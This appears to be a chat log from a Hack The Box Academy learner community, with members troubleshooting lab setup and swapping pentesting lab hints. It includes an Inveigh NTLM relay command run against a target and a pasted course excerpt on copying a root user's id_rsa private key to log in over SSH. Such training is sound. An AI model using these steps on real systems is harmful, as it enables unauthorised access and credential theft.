3. When I try to install I keep getting the following error in PowerShell:

WslRegisterDistribution failed with error: 0x80370109 Error: 0x80370109 The operation timed out because a response was not received from the virtual machine or container.

I've tried searching online for solutions but not having any luck. Thanks!

Dammm, it worked but I still don't understand why?? lmao

Thank you so much!!!

Could you help me with the medium lab of footprinting?

.\Inveigh-Relay.ps1
PS C:\Users\Administrator\desktop> Invoke-InveighRelay -Target (ip)
Invoke-InveighRelay : The term 'Invoke-InveighRelay' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.

any idea why i cant get Inveigh-Relay.ps1 to work ?

alright i got the flag.

I wasn't importing the module 😄 bloody hell

Because mssql is only running internally

not sure who wrote the active directory module, but really enjoying this one. good job

https://academy.hackthebox.com/module/87/section/885

do i need to setup a seperate windows enviro it seems the info provided on how to do so is outdated?

confused because it states win/10 but windows is saying its win/11

setup should be the same as Windows 10

marcilee the nmap scan took 4 hours i just fell asleep and woke up and it was still going lmfao

Is it required to setup a seperate windows enviroment or i can use a lying around device

it is good practice to use a virtual machine for any pentesting activity

yeah

or if u want just dual boot

So do i download the Dev VM they link me?

but i prefer a VM

makes everything easier 4 me

yep. choose the VM image based on the hypervisor you're using

im using VMware workstation so i assume VMware?

yes

it's not really a hard requirement to set up a Windows VM, but it's helpful to have in some cases

It shouldn't take that long

my head hurts from reading the windows module rn

Sometimes windows gets mad when you compile things on non-windows machines

even when i want to compile something on windows, microsoft just doesn't let me (visual studio 2017)

yeah i know

Also 4h, the target died

yeah i saw it die when i woke up

im a just continue once i finish something up

How can meterpreter reside "...entirely in the memory of the remote host and leaves no traces on the hard drive." and yet also be persistent across reboots?

can anyone help me with: https://academy.hackthebox.com/module/77/section/844, 2nd question

anyone knows why **cup **will not generate permutations for some strings that I specify ?

SSH Keys
Finally, let us discuss SSH keys. If we have read** access over the .ssh directory** for a specific user, we may read their private ssh keys found in /home/user/.ssh/id_rsa or /root/.ssh/id_rsa, and use it to log in to the server. If we can read the /root/.ssh/ directory and can read the id_rsa file, we can copy it to our machine and use the -i flag to log in with it:

Xoriath@htb[/htb]$ vim id_rsa Xoriath@htb[/htb]$ chmod 600 id_rsa Xoriath@htb[/htb]$ ssh root@10.10.10.10 -i id_rsa

root@10.10.10.10#

Need more info. Since you're user 2 did you check and see what user2 might have access to, that that normally shouldn't?

This feels like a copy/paste rather than actual help tbh

Yes, is the info provided by the lesson that can help

Also nice alt xoriath

what ?

Rather lead a horse to water than show them the direct answer

Considering the copy/paste from that account has your username in the @[/htb]$

:)

ah lol, wtf how come the copy paste of that guy has my name ?

Weird ik

Unless they copied from one of your messages

not able to find that, it asks for user2 passwd which I don't have